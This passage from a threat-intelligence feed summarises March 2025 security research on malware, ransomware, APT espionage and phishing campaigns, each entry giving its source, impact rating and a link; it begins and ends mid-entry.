Summary:: SonicWall researchers have discovered a new evolution in the Horus Protector distributed infection chain, which is currently targeting the French region. The malware, MoDiRAT, is known for stealing credit card and personal information. During the infection process, it deploys the DarkCloud stealer, but before exiting, the loader checks if the victim is located in France. If confirmed, the victim's machine is further infected with MoDiRAT.

Source: https://www.sonicwall.com/blog/modirat-malware-uses-horus-protector-to-target-france

Intel Source:: Securelist

Intel Name:: APT_Attack_Uses_Chrome_Zero_Day

Date of Scan:: 2025-03-27

Impact:: LOW

Summary:: Resarchers at Securelist have identified Operation ForumTroll, an advanced APT attack that exploits a zero-day vulnerability (CVE-2025-2783) in Google Chrome. This vulnerability enables attackers to avoid Chrome's sandbox by exploiting a logical defect at the browser-Windows OS intersection. The attack targeted Russian media and educational organizations with phishing emails imitating invites to the "Primakov Readings" forum.

Source: https://securelist.com/operation-forumtroll/115989/

Intel Source:: Cybereason

Intel Name:: The_Mysterious_Case_of_PlayBoy_Locker

Date of Scan:: 2025-03-27

Impact:: MEDIUM

Summary:: Cybereason researchers have investigated the PlayBoy Locker Ransomware-as-a-Service (RaaS), which provides unskilled cybercriminals with a comprehensive toolkit to launch ransomware attacks. The platform offers customizations for targeting Windows, NAS, and ESXi systems, along with frequent updates, anti-detection features, and customer support. Since its emergence in September 2024, PlayBoy Locker operates on an affiliate model, splitting ransom payments 85/15% with affiliates.

Source: https://www.cybereason.com/blog/threat-analysis-playboy-locker

Intel Source:: Inde

Intel Name:: SectopRAT_Targets_Window_Users

Date of Scan:: 2025-03-27

Impact:: LOW

Summary:: SectopRAT, a newly discovered malware that targets Window users by disguising itself as a Cloudflare Turnstile CAPTCHA challenge. When user complete the verification process, the malware downloads onto their system while showing a regular website. SectopRAT is distributed through malvertising campaign and drive-by download of illegitimate software. The malware starts with JavaScript based loader to monitor the system environment and then downloads more malicious files using encrypted connections that executes PowerShell command to gain persistence and deliver the SectopRAT payload which steal user’s sensitive data such as passwords, financial details and cryptocurrency wallets.

Source: https://www.inde.nz/blog/i-am-not-a-robot

Intel Source:: Cyfirma

Intel Name:: APT36_Targets_India_via_Fake_IndiaPost

Date of Scan:: 2025-03-26

Impact:: LOW

Summary:: Researchers from CYFIRMA have discovered a Pakistan-based APT group known as APT36, which was rated with medium confidence as exploiting Pakistan's Prime Minister Youth Laptop Scheme to target Indian consumers. The group constructed a false IndiaPost website that sends a malicious PDF to Windows users and instructs them to run a PowerShell command, while mobile users receive a trojanized APK masquerading as an IndiaPost app.

Source: https://www.cyfirma.com/research/turning-aid-into-attack-exploitation-of-pakistans-youth-laptop-scheme-to-target-india/

Intel Source:: Seqrite

Intel Name:: SnakeKeylogger_Multi_Stage_Attack_Observed

Date of Scan:: 2025-03-26

Impact:: MEDIUM

Summary:: Researchers from Seqrite Labs have discovered a multi-stage malware operation that delivered SnakeKeylogger, a credential-stealing information stealer, via malicious spam emails. The attack starts with an.img file attachment that, when opened, mounts a virtual drive containing a disguised executable posing as a PDF document. This downloader obtains an encoded payload from a remote Apache server, which is then decrypted and performed in-memory to avoid detection. SnakeKeylogger then collects sensitive data such as email addresses, browser-stored passwords, and FTP login information.

Source: https://www.seqrite.com/blog/snakekeylogger-a-multistage-info-stealer-malware-campaign/

Intel Source:: K7 Labs

Intel Name:: Kimsuky_Latest_Cyberattack

Date of Scan:: 2025-03-26

Impact:: MEDIUM

Summary:: Researchers at K7 Labs have identified a cyberattack linked to the North Korean state sponsored group called Kimsuky aka Black Banshee known for cyber espionage and data theft. The cyberattack involves a zip file containing four additional files such as a VBScript, a PowerShell script and two encoded text files. When these files are executed, it collects system’s BIOS serial number and create a unique directory in the temp folder to store attack-related file and checks virtual machine environment. If detected, it deletes all files associated with the attack. Additionally, the malware also includes functions for stealing sensitive data, extracting cryptocurrency wallet information and establishing communication with the C2 server.

Source: https://labs.k7computing.com/index.php/inside-kimsukys-latest-cyberattack-analyzing-malicious-scripts-and-payloads/

Intel Source:: ANY.RUN

Intel Name:: Technical_Analysis_of_GorillaBot

Date of Scan:: 2025-03-26

Impact:: LOW

Summary:: GorillaBot is a newly discovered Mirai-based botnet that has been actively targeting systems across over 100 countries, issuing over 300,000 attack commands between September 4 and 27. It affects various industries, including telecommunications, finance, and education. The botnet uses custom encryption, evasion techniques, and secure C2 communication via raw TCP sockets and an XTEA-like cipher. It includes anti-debugging measures and authenticates with a SHA-256-based token. GorillaBot’s attack commands are encoded, hashed, and executed using a Mirai-style function.

Source: https://any.run/cybersecurity-blog/gorillabot-malware-analysis/

Intel Source:: Sygnia

Intel Name:: Weaver_Ant_China_Nexus_Web_Shell_Attacks

Date of Scan:: 2025-03-25

Impact:: LOW

Summary:: Researchers at Sygnia have uncovered a Chinese-nexus threat actor known as Weaver Ant infiltrating a major Asian telecommunications company. The attackers used web shells, including an encrypted version of China Chopper and a previously unknown 'INMemory' web shell, to sustain persistence and aid cyber espionage.

Source: https://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/

Intel Source:: Arctic Wolf

Intel Name:: INDOHAXSEC_Rising_Indonesian_Hackers

Date of Scan:: 2025-03-25

Impact:: LOW

Summary:: Arctic Wolf researchers have identified that the Indonesian-based hacktivist collective INDOHAXSEC has been active in Southeast Asia, conducting cyberattacks such as DDoS and ransomware attacks against various entities, including government bodies. Motivated primarily by political goals, with occasional financial motives, the group uses both custom and publicly available hacking tools. They maintain a strong online presence on platforms like GitHub, Telegram, and social media, seemingly prioritizing notoriety over operational security.

Source: https://arcticwolf.com/resources/blog/indohaxsec-emerging-indonesian-hacking-collective/

Intel Source:: ESET Research

Intel Name:: FishMedley_Cyberattack_Identified

Date of Scan:: 2025-03-25

Impact:: MEDIUM

Summary:: Researchers from ESET have observed Operation FishMedley, a global espionage operation carried out by the FishMonger APT group and related to the Chinese contractor I-SOON. The campaign targeted governments, NGOs, and think tanks in Asia, Europe, and the United States, using implants including ShadowPad, SodaMaster, and Spyder tools usually linked with China-aligned threat actors.

Source: https://www.welivesecurity.com/en/eset-research/operation-fishmedley/

Intel Source:: G DATA

Intel Name:: Python_Based_AnubisBackdoor_Found

Date of Scan:: 2025-03-24

Impact:: LOW

Summary:: Researchers at G Data have found a new Python-based backdoor known as "AnubisBackdoor," which was used by the financially motivated threat group FIN7 during recent attacks. To avoid detection, the malware, which is delivered by phishing emails containing ZIP archives, uses various layers of obfuscation and encryption. Initially, the malware employs AES-encrypted Python scripts to execute payloads invisibly, reducing forensic traces.

Source: https://www.gdatasoftware.com/blog/2025/03/38161-analysis-fin7-anubis-backdoor

Intel Source:: Elastic Security Labs

Intel Name:: ABYSSWORKER_Driver_in_Medusa_Attacks

Date of Scan:: 2025-03-24

Impact:: LOW

Summary:: Researchers at Elastic Security Labs have discovered the usage of ABYSSWORKER, a malicious driver distributed alongside the MEDUSA ransomware, to deactivate endpoint detection and response (EDR) systems. Cybercriminals use either vulnerable genuine drivers or custom-built drivers to avoid detection. The HEARTCRYPT-packed loader installed the ABYSSWORKER driver, which was signed with a revoked certificate from a Chinese vendor and used to silence numerous EDR suppliers.

Source: https://www.elastic.co/security-labs/abyssworker

Intel Source:: ISC.SANS

Intel Name:: Mirai_Botnet_Targets_DrayTek_Routers

Date of Scan:: 2025-03-24

Impact:: LOW

Summary:: Researchers at ISC.SANS have discovered that the Mirai botnet now includes exploits targeting DrayTek Vigor routers. These attacks are based on vulnerabilities published by Forescout in October, which initially affected around 700,000 devices. Attackers are primarily targeting the "mainfunction.cgi" and "keyPath" vulnerabilities, with continued efforts to exploit "cvmcfgupload." Some attack attempts appear to be faulty, perhaps due to errors in exploit scripts.

Source: https://isc.sans.edu/diary/Mirai+Bot+now+incroporating+malformed+DrayTek+Vigor+Router+Exploits/31770/

Intel Source:: ASEC

Intel Name:: Malicious_HWP_Disguised_as_Education_Application

Date of Scan:: 2025-03-24

Impact:: LOW

Summary:: ASEC researchers have discovered a post recruiting students for a course that contained a link to download a malicious HWP document. The HWP file, disguised as an application form, contained both a legitimate document and a malicious BAT file. When opened, the BAT file creates and executes additional files, including services like 0304.exe, which download further malware. The malware connects to an external URL to retrieve and execute additional commands, making it difficult for users to detect.

Source: https://asec.ahnlab.com/en/86841/

Intel Source:: Socket

Intel Name:: Lazarus_Group_Hits_NPM_with_Malicious_Packages

Date of Scan:: 2025-03-24

Impact:: MEDIUM

Summary:: Researchers from Socket have uncovered six new malicious npm packages linked to North Korea’s Lazarus Group. These packages are designed to steal credentials, extract cryptocurrency data, and deploy backdoors, and are downloaded over 330 times. The packages used typosquatting tactics, mimicking trusted libraries, and were hosted on GitHub to appear legitimate, increasing the risk of integration into developer workflows.

Source: https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages

Intel Source:: Trend Micro

Intel Name:: Albabat_Ransomware_Expands_to_Multiple_OS

Date of Scan:: 2025-03-23

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have identified new versions of the Albabat ransomware, now targeting Windows, Linux, and macOS devices. The ransomware uses GitHub's REST API to streamline operations, retrieving configuration data under the Awesome App User-Agent. Albabat version 2.0 encrypts various file types and skips specific folders and files. It also terminates multiple processes related to common applications. The ransomware tracks infections and payments through a database, aiding in ransom demands and data sales. Additionally, binaries for Linux and macOS are included in these newer versions.

Source: https://www.trendmicro.com/en_us/research/25/c/albabat-ransomware-group.html

Intel Source:: Securelist

Intel Name:: Head_Mare_and_Twelve_Target_Russia_Together

Date of Scan:: 2025-03-23

Impact:: LOW

Summary:: Researchers at Securelist have discovered a coordinated cyberattack against Russian firms, which they link to the hacktivist organizations Twelve and Head Mare. According to the inquiry, Head Mare used command-and-control infrastructure and technologies that were previously connected to Twelve, suggesting that they may have worked together. The attackers used both new and old tools, such as a modified PhantomJitter backdoor, the CobInt backdoor, which was previously only available to Twelve, and malware based on PowerShell.

Source: https://securelist.com/head-mare-twelve-collaboration/115887/

Intel Source:: Sentinelone

Intel Name:: Dragon_RaaS_Emerging_Ransomware_Threat

Date of Scan:: 2025-03-23

Impact:: LOW

Summary:: Researchers from SentinelOne have discovered that Dragon RaaS, a pro-Russian ransomware gang, formed as an offshoot of the Stormous group, which is tied to the bigger cybercrime syndicate known as "The Five Families." While Dragon RaaS presents itself as a sophisticated Ransomware-as-a-Service (RaaS) organization, its operations are primarily opportunistic, involving website defacements and smaller-scale ransomware events. The gang primarily targets organizations in the United States, the United Kingdom, Israel, France, and Germany using misconfigurations, brute-force attacks, and stolen credentials.

Source: https://www.sentinelone.com/blog/dragon-raas-pro-russian-hacktivist-group-aims-to-build-on-the-five-families-cybercrime-reputation/

Intel Source:: ISC.SANS

Intel Name:: Python_Bot_via_DLL_Side_Loading_Attack

Date of Scan:: 2025-03-23

Impact:: LOW

Summary:: Researchers at ISC.SANS have identified Python-based malware distributed via DLL side-loading. The attack starts with a ZIP bundle called "Hootsuite (1).zip," which contains hidden files. When opened, it shows a non-malicious program called Hootsuite.exe, which is actually an old version of the Haihaisoft PDF reader with a DLL side-loading vulnerability.

Source: https://isc.sans.edu/diary/rss/31778

Intel Source:: Palo Alto

Intel Name:: Unique_Malware_Samples_Identified

Date of Scan:: 2025-03-23

Impact:: LOW

Summary:: Researchers from Palo Alto Networks have discovered three unique malware strains with unusual characteristics. The first is a passive IIS backdoor developed in C++/CLI, a language rarely utilized in malware. The second is a bootkit that uses an unprotected kernel driver to install the GRUB 2 bootloader in an unexpected way. The third is a Windows implementation of a cross-platform post-exploitation framework in C++ that differs significantly from the frameworks seen last year. These findings underscore threat actors' shifting approaches, which include both custom-built and unusual malware tools.

Source: https://unit42.paloaltonetworks.com/unusual-malware/

Intel Source:: Cofense

Intel Name:: Clickbait_to_Catastrophe

Date of Scan:: 2025-03-22

Impact:: LOW

Summary:: Cofense researchers have discovered a phishing campaign targeting Meta Business account holders through fake Instagram alert claiming that user has violated advertising policies and that their ads are suspended. The email includes a Check more Details button that redirect to fake Meta support page. Once user reaches that page, they see Request review prompts to enter their name and business email, leading them to a fake chatbot. If the chatbot process fails, the attackers trick users to follow the fake System check instructions to fix their account which give the attackers access by registering their own authentication app. The attacker’s main goal is to hijack the account and steal sensitive information.

Source: https://cofense.com/blog/clickbait-to-catastrophe-how-a-fake-meta-email-leads-to-password-plunder

Intel Source:: BitDefender

Intel Name:: CVE_2024_4577_Exploited_in_Mass_Attacks

Date of Scan:: 2025-03-22

Impact:: LOW

Summary:: Researchers at Bitdefender have tracked a new campaign where threat actors are exploiting CVE-2024-4577, a vulnerability first identified in June 2024. This critical security flaw in PHP, affecting Windows systems in CGI mode, enables remote attackers to execute arbitrary code by manipulating character encoding conversions.

Source: https://www.bitdefender.com/en-us/blog/businessinsights/technical-advisory-update-mass-exploitation-cve-2024-4577

Intel Source:: Medium(S2W Threat Research)

Intel Name:: DocSwap_A_Deceptive_Cyber_Threat

Date of Scan:: 2025-03-22

Impact:: LOW

Summary:: Researchers at S2W Threat Research have uncovered DocSwap, a new malware masquerading as a Document Viewing Authentication App, which is most likely tied to a North Korean-backed APT group. This malware, which was first signed on December 13, 2024, decrypts an internal file, dynamically loads a DEX file, and uses a C2 server to undertake malicious actions such as keylogging and information stealing.

Source: https://medium.com/s2wblog/detailed-analysis-of-docswap-malware-disguised-as-security-document-viewer-218a728c36ff

Intel Source:: ASEC

Intel Name:: Downloader_Malware_Created_with_JPHP_Interpreter

Date of Scan:: 2025-03-22

Impact:: LOW

Summary:: ASEC researchers have discovered a malware that uses JPHP, a PHP interpreter that runs on Java's Virtual Machine. This malware is distributed through ZIP file containing a Java Runtime Environment and various libraries which allow to run on the victim’s machine even if java is not installed. When the malware executes, it starts Java process that loads malicious JPHP file to download and installs other malware like Strrat and DanaBot.

Source: https://asec.ahnlab.com/ko/86829/

Intel Source:: TheRavenFile

Intel Name:: VanHelsing_Ransomware

Date of Scan:: 2025-03-22

Impact:: HIGH

Summary:: VanHelsing Ransomware emerged on March 18, 2025, targeting Windows systems primarily in the US and France. It encrypts files with .vanhelsing and .vanlocker extensions using a combination of Curve25519, AES, and Salsa20/ChaCha encryption algorithms, with XOR encoding for obfuscation. The ransomware drops a malicious executable named locker.exe and creates a mutex (Global\VanHelsing) to ensure only one instance runs at a time. It demands a ransom of $40,000 in Bitcoin and communicates with its infrastructure via Onion links for data leakage and ransom negotiation. The ransomware leverages nginx servers hosted by Xhost Internet Solutions.

Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/VanHelsing%20Ransomware

Intel Source:: Hunt.IO

Intel Name:: Rust_Beacon_Delivers_Cobalt_Strike_to_South_Korea

Date of Scan:: 2025-03-21

Impact:: LOW

Summary:: Researchers at Hunt.IO have discovered a publicly exposed web server containing tools linked to an intrusion campaign targeting South Korean organizations. The server, active for less than 24 hours, hosted a Rust-compiled Windows executable delivering a modified version of Cobalt Strike, along with other tools like SQLMap, Web-SurvivalScan, and dirsearch. These tools suggest the actor exploited vulnerable web applications. Metadata indicates some attacks were successful, with government and commercial entities as the primary targets. The combination of a Rust-compiled loader and modified Cobalt Strike highlights the actor's approach to malware delivery and post-exploitation.

Source: https://hunt.io/blog/rust-beacon-cobalt-strike-cat-south-korea#Cobalt_Strike_Cat_Open_Directory_Host_Observables_and_IOCs

Intel Source:: Safe{Wallet}

Intel Name:: Safe_Wallet_Confirms_North_Korea_Crypto_Hack

Date of Scan:: 2025-03-21

Impact:: LOW

Summary:: Safe{Wallet} has confirmed that the $1.5 billion Bybit crypto heist was a highly sophisticated, state-sponsored attack carried out by North Korean hacking group TraderTraitor (Jade Sleet, PUKCHONG, UNC4899). The hackers compromised a Safe{Wallet} developer's macOS laptop by tricking them into downloading a malicious Docker project via social engineering. They then hijacked AWS session tokens, bypassing MFA security controls. The attack, which began on February 4, 2025, involved advanced tactics to erase traces, hindering investigation efforts.

Source: https://x.com/safe/status/1897663514975649938?s=09

Intel Source:: Forescout

Intel Name:: New_Ransomware_Operator_Exploits_Fortinet_Vulnerability_Duo

Date of Scan:: 2025-03-21

Impact:: MEDIUM

Summary:: Forescout researchers have identified a series of intrusions exploiting two Fortinet vulnerabilities, starting with the compromise of Fortigate firewall appliances and culminating in the deployment of a new ransomware strain called SuperBlack. The intrusions are attributed to the threat actor "Mora_001," named after Slavic mythology, due to its use of Russian artifacts. This actor combines opportunistic attacks with connections to the LockBit ransomware ecosystem, highlighting the growing complexity of modern ransomware operations, where specialized teams collaborate to enhance their capabilities.

Source: https://www.forescout.com/blog/new-ransomware-operator-exploits-fortinet-vulnerability-duo/

Intel Source:: Welivesecurity

Intel Name:: MirrorFace_Targets_Europe_with_ANEL_Backdoor

Date of Scan:: 2025-03-21

Impact:: MEDIUM

Summary:: ESET researchers have discovered that the MirrorFace cyber espionage group expanded its operations to target a Central European diplomatic institute, marking their first attack on a European entity. The group is using the ANEL backdoor, previously linked to APT10, and deploying a customized version of AsyncRAT with a complex execution chain inside Windows Sandbox. The investigation also revealed updates in MirrorFace’s tactics, techniques, and tools (TTPs).

Source: https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/

Intel Source:: BI.ZONE

Intel Name:: Squid_Werewolf_Poses_as_Job_Recruiters

Date of Scan:: 2025-03-20

Impact:: LOW

Summary:: BI.ZONE researchers have identified a phishing campaign by the Squid Werewolf (APT37) group, targeting victims with fake job offers from an industrial organization. The attack involves a password-protected ZIP file containing a malicious LNK file. When opened, the file executed a sequence of commands that decoded Base64 data and copied an executable (dfsvc.exe) to the startup folder for persistence. Additional malicious files, including a DLL and a PDF, are saved to run further malicious actions.

Source: https://bi.zone/eng/expertise/blog/sotni-tysyach-rubley-za-vashi-sekrety-kibershpiony-squid-werewolf-maskiruyutsya-pod-rekruterov/?utm_source=main&utm_medium=link&utm_campaign=sotni-tysyach-rubley-za-vashi-sekrety-kibershpiony-squid-werewolf-maskiruyutsya-pod-rekruterov

Intel Source:: CERT-AGID

Intel Name:: Phishing_Campaign_Targeting_UniPd

Date of Scan:: 2025-03-20

Impact:: LOW

Summary:: Researchers from CERT-AGID have identified a phishing campaign targeting the University of Padua in which attackers are stealing the credential from the student and employees of the university. They have created the two fake websites impersonating the university to trick users into entering their credentials.

Source: https://cert-agid.gov.it/news/campagna-di-phishing-mirata-a-unipd-circa-200-credenziali-compromesse/

Intel Source:: MalwareBytes

Intel Name:: Online_File_Converters_Installs_Malware

Date of Scan:: 2025-03-19

Impact:: LOW

Summary:: Malwarebytes researchers have observed that cybercriminals are creating fake online file conversion websites are creating that offer free services but actually deliver a malware. These sites often convert [.]doc to [.]pdf or merge multiple images into single .pdf. Once users are compromised, the malware steals sensitive information such as social Security Numbers, banking credentials, cryptocurrency wallets, email addresses and login passwords. Additionally, it can capture session tokens that allow cybercriminals to bypass multi-factor authentication.

Source: https://www.malwarebytes.com/blog/news/2025/03/warning-over-free-online-file-converters-that-actually-install-malware

Intel Source:: Microsoft

Intel Name:: Phishing_campaign_impersonates_Booking_dot_com

Date of Scan:: 2025-03-19

Impact:: LOW

Summary:: Researchers from Microsoft Threat Intelligence have discovered an ongoing phishing attack that impersonates Booking.com and targets hospitality firms in numerous regions, having been active since December 2024. The effort uses the ClickFix social engineering technique, which tricks users into running commands that download credential-stealing malware, aiding financial theft. Attackers take advantage of humans' problem-solving abilities by displaying bogus error messages, enticing users to open a Windows Run window and run a malicious command.

Source: https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/

Intel Source:: Microsoft

Intel Name:: StilachiRAT_Analysis

Date of Scan:: 2025-03-19

Impact:: LOW

Summary:: Microsoft researchers have identified a new RAT called StilachiRAT which is designed to steal sensitive data, evade detection and maintain persistence to compromised systems. It is capable of gathering detailed system information including OS details, hardware identifiers and active applications. The malware using multiple techniques to remain hidden while collecting information from the target system. StilachiRAT connects to C2 servers that allow attackers to remotely execute commands, use the infected system as a proxy and manipulate registry settings. It also continuously monitors the clipboard to search for sensitive information such as passwords or cryptocurrency wallet addresses.

Source: https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/

Intel Source:: Trend Micro

Intel Name:: SocGholish_Distribution_of_RansomHub_Ransomware

Date of Scan:: 2025-03-19

Impact:: LOW

Summary:: Researchers at Trend Micro have observed the complex intrusion set Water Scylla, which includes multiple stages such as compromised websites, collaboration with threat actors via rogue Keitaro TDS instances, SocGholish payload delivery, and post-compromise activity that leads to RansomHub ransomware. SocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader and evasion strategies to avoid standard detection. It spreads by compromised respectable websites, sending visitors to bogus browser update notices that include malicious payloads.

Source: https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html

Intel Source:: Trustwave

Intel Name:: Fake_Captcha_Malware_Campaign

Date of Scan:: 2025-03-18

Impact:: LOW

Summary:: Trustwave researchers have discovered a campaign using fake CAPTCHA verifications to trick victims into running PowerShell scripts to deliver malware like Lumma and Vidar. The attacks begins when user visit a malicious website and see the CAPTCHA for verification. However, instead of verifying the user, it prompts them to execute a PowerShell command. The command uses Mshta tool to download and execute the MP4 video file which launches another PowerShell scripts that installs infostealers like Lumma and Vidar that secretly steal personal data, login credentials and financial information.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/resurgence-of-a-fake-captcha-malware-campaign/

Intel Source:: EclecticIQ

Intel Name:: Black_Basta_Raas_Members_Target_Edge_Network_Devices

Date of Scan:: 2025-03-18

Impact:: MEDIUM

Summary:: EclecticIQ researchers have identified a leak of internal chat logs from @ExploitWhispers telegram channel, a Russian speaking actor linked to Black Basta RaaS group. These chat logs covering communication from September 2023 to September 2024 which reveal the details of group operations including the use of a brute-forcing framework called BRUTED. This tool automates internet scanning and credential stuffing attacks on network edge devices such as firewalls and VPN solutions. The leaked chat also reveals internal conflicts, key member roles and infrastructure details. The group primarily targets Business Services, Industrial Machinery and Manufacturing sector.

Source: https://blog.eclecticiq.com/inside-bruted-black-basta-raas-members-used-automated-brute-forcing-framework-to-target-edge-network-devices

Intel Source:: SEQRITE

Intel Name:: Exposing_the_GrassCall_Campaign

Date of Scan:: 2025-03-18

Impact:: LOW

Summary:: The GrassCall malware campaign, led by the Russian-speaking cybercriminal group Crazy Evil and its subgroup kevland, targets job seekers in the cryptocurrency and Web3 sectors. Using fake job interviews, the attackers deploy malware to compromise victim's systems and steal their digital assets. Since 2021, Crazy Evil has become a major threat, specializing in identity fraud, cryptocurrency theft, and sophisticated social engineering tactics. Their operations involve "traffers," experts who manipulate online traffic to lure victims into phishing scams, leading to significant financial losses.

Source: https://www.seqrite.com/blog/unmasking-grasscall-campaign-the-apt-behind-job-recruitment-cyber-scams/

Intel Source:: Trustwave

Intel Name:: Exploring_Strela_Stealer_Attacks_in_Europe

Date of Scan:: 2025-03-18

Impact:: LOW

Summary:: Strela Stealer is an infostealer malware that has been active since late 2022, primarily targeting Mozilla Thunderbird and Microsoft Outlook users in selected European countries. Operated by the threat actor ‘Hive0145’, it is distributed via large-scale phishing campaigns, often replacing legitimate invoice attachments with a ZIP archive containing the malware loader. Strela Stealer’s infrastructure is linked to Russian bulletproof hosting providers. Over time, the malware has evolved with advanced obfuscation techniques and a specialized crypter, ‘Stellar loader’, to evade detection. A recent phishing campaign at the start of this year targeted German-speaking users, showcasing the malware’s continued development.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-deep-dive-into-strela-stealer-and-how-it-targets-european-countries/

Intel Source:: Microsoft

Intel Name:: A_New_Variant_of_XCSSET_Malware

Date of Scan:: 2025-03-17

Impact:: MEDIUM

Summary:: Researchers at Microsoft have discovered a new version of XCSSET malware that infects Xcode projects on macOS. This malware is capable of stealing sensitive data such as system details, user files, digital wallet data and personal notes. The XCSSET malware has stronger obfuscation techniques, updated persistence methods and new methods to distribute. This malware spread by embedding itself into X projects that commonly share among developers. It also has an active command-and-control (C2) server that downloads more malicious modules.

Source: https://www.microsoft.com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/

Intel Source:: Palo Alto

Intel Name:: New_DGA_Variant_Uses_Typo_Evasion_Tactics

Date of Scan:: 2025-03-16

Impact:: LOW

Summary:: Researchers at Palo Alto have discovered a new cyberattack campaign, utilizing over 6,000 newly registered domains (NRDs) that employ a novel domain generation algorithm (DGA) variant. The DGAs are dictionary-based, creating domain names that resemble legitimate ones to evade detection. These NRDs redirected users to ads for potentially unwanted Android apps, with 96% of associated files being malicious. Further investigation revealed a broader scope, with 444,898 NRDs tied to the same actor, redirecting to 178 domains exhibiting a new "typo DGA" pattern. This pattern involves dictionary words with typographical errors, enhancing evasion tactics. The discovery was made through a novel graph-intelligence pipeline that correlates domain registrations, hosting infrastructure, and passive DNS and WHOIS data.

Source: https://unit42.paloaltonetworks.com/typo-domain-generation-algorithms/

Intel Source:: CISA

Intel Name:: An_Investigation_of_Medusa_Ransomware

Date of Scan:: 2025-03-16

Impact:: MEDIUM

Summary:: The FBI, CISA, and MS-ISAC have issued a joint advisory detailing known tactics, techniques, and procedures (TTPs) related to Medusa ransomware. First identified in June 2021, Medusa is a ransomware-as-a-service (RaaS) that has impacted over 300 victims across various critical sectors, including healthcare, education, legal, insurance, technology, and manufacturing, as of February 2025.

Source: https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf

Intel Source:: SecuronixThreatLabs

Intel Name:: Analyzing_OBSCUREBAT

Date of Scan:: 2025-03-16

Impact:: HIGH

Summary:: Securonix Threat Research has identified a stealthy malware campaign, tracked as OBSCURE#BAT, that uses social engineering and deceptive file downloads to compromise systems. The attack begins with heavily obfuscated batch scripts that deploy a user-mode rootkit, identified as r77, capable of hiding files, processes, and registry entries. The malware establishes persistence through scheduled tasks and registry-injected PowerShell scripts, making it difficult to detect using standard tools. The r77 rootkit can mask any file, registry key, or task beginning with a specific prefix. The attackers' methods include fake CAPTCHA prompts and masquerading as legitimate software. The malware's ability to hide its artifacts and manipulate system processes represents a significant threat, as it can evade detection and maintain a persistent presence. Securonix's analysis indicates the malware monitors user interactions, including clipboard activity, and saves this data into hidden files. The ultimate goal appears to be data exfiltration and system control, potentially leveraging the QuasarRAT, as indicated by observed network connections. The implications are severe, as compromised systems could be used for espionage, data theft, or further attacks.

Source: https://www.securonix.com/blog/analyzing-obscurebat-threat-actors-lure-victims-into-executing-malicious-batch-scripts-to-deploy-stealthy-rootkits/

Intel Source:: Mandiant

Intel Name:: UNC3886_Targets_Juniper_Routers

Date of Scan:: 2025-03-16

Impact:: MEDIUM

Summary:: Google/Mandiant researchers have uncovered a cyber espionage campaign conducted by UNC3886. This group is China-nexus based threat group known for targeting network and virtualization technologies. The primary focus of this group is to target defense, technology, and telecommunication organizations located in the US and Asia. In this campaign, the attackers deploy custom backdoor on Juniper Networks' Junos OS routers which is based on TINYSHELL malware that allow attackers to secretly access and control compromised devices. Additionally, the malware includes a script that disables logging features to cover its tracks.

Source: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/

Intel Source:: Palo Alto

Intel Name:: Activities_of_REMCOS_RAT

Date of Scan:: 2025-03-15

Impact:: LOW

Summary:: Palo Alto researchers have identified the REMCOS RAT continues to spread via email, with cybercriminals using tactics to bypass spam filters. One such method involves disguising a zip archive with a .7z extension. Despite lacking 7-Zip software on a Windows 11 system, File Manager extracted the malware from the archive, highlighting potential vulnerabilities in file handling and extraction.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-10-IOCs-for-Remcos-RAT-activity.txt

Intel Source:: ISC.SANS

Intel Name:: Stealthy_Shellcode_Encoding_with_UUIDs

Date of Scan:: 2025-03-15

Impact:: LOW

Summary:: Researchers at ISC.SANS have discussed a stealthy malware technique where the shellcode is encoded into UUIDs (Universally Unique Identifiers) to evade detection. By using the Windows API function `UuidFromStringA()`, malware authors can convert UUID strings into raw shellcode, which is then injected into memory for execution. This method hides the shellcode in plain sight, making it difficult for detection tools to flag it, as the payload appears legitimate. The technique has been linked to groups like Lazarus and is part of a broader effort to bypass traditional security measures.

Source: https://isc.sans.edu/diary/Shellcode+Encoded+in+UUIDs/31752/

Intel Source:: malwr-analysis

Intel Name:: APT28_HTA_Trojan

Date of Scan:: 2025-03-14

Impact:: MEDIUM

Summary:: Researchers from Malware Analysis have discovered a new malware called HTA trojan which is being used by APT 28 to target diplomatic organisations in Central Asia and Kazakhstan. APT 28 uses unique encoding method called VBScript Encoded to hide the malicious script and also added extra layers of obfuscation to make detection more difficult. They also use special character like @#@ into their code. Additionally, the malware takes advantage of a built-in Windows component called vbscript.dll to decode and hidden commands.

Source: https://malwareanalysisspace.blogspot.com/2025/03/deobfuscating-apt28s-hta-trojan-deep.html

Intel Source:: Cyfirma

Intel Name:: LithiumWare_Ransomware

Date of Scan:: 2025-03-14

Impact:: MEDIUM

Summary:: Cyfirma researchers have uncovered a new ransomware strain called LithiumWare (LithiumWareV2.exe). It first appeared in December 2024 and performs various malicious activities including encrypting files, modifying system settings, establishing persistence and evading detection. The ransomware uses AES and RSA encryption to lock files. It also monitors the clipboard to steal cryptocurrency transactions by replacing wallet addresses with attacker’s wallet addresses. Additionally, it modifies the Windows registry, creates startup entries and copies itself to hidden system directories. Once files are encrypted, the ransomware drops a ransom note demanding a payment of $900,000 in exchange for the decryption key.

Source: https://www.cyfirma.com/research/lithiumware-ransomware/

Intel Source:: Securelist

Intel Name:: YouTubers_Distributing_SilentCryptoMiner

Date of Scan:: 2025-03-14

Impact:: LOW

